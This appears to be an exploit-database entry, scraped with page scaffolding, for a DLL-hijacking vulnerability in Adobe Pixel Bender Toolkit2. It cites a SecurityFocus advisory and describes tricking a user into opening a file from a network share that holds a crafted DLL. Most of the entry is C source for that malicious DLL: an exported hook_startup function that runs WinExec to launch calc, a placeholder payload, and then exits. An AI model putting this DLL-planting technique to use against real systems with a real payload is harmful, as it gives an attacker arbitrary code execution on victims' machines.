17 lines
No EOL
545 B
C
17 lines
No EOL
545 B
C
// source: https://www.securityfocus.com/bid/55179/info
|
|
|
|
Adobe Pixel Bender Toolkit2 is prone to multiple vulnerabilities that allow attackers execute arbitrary code.
|
|
|
|
An attacker can exploit these issues by enticing a legitimate user to use the vulnerable application to open a file from a network share location that contains a specially crafted Dynamic Link Library (DLL) file.
|
|
|
|
#include <windows.h>
|
|
#define DllExport __declspec (dllexport)
|
|
|
|
DllExport void hook_startup() { exp(); }
|
|
|
|
int exp()
|
|
{
|
|
WinExec("calc", 0);
|
|
exit(0);
|
|
return 0;
|
|
} |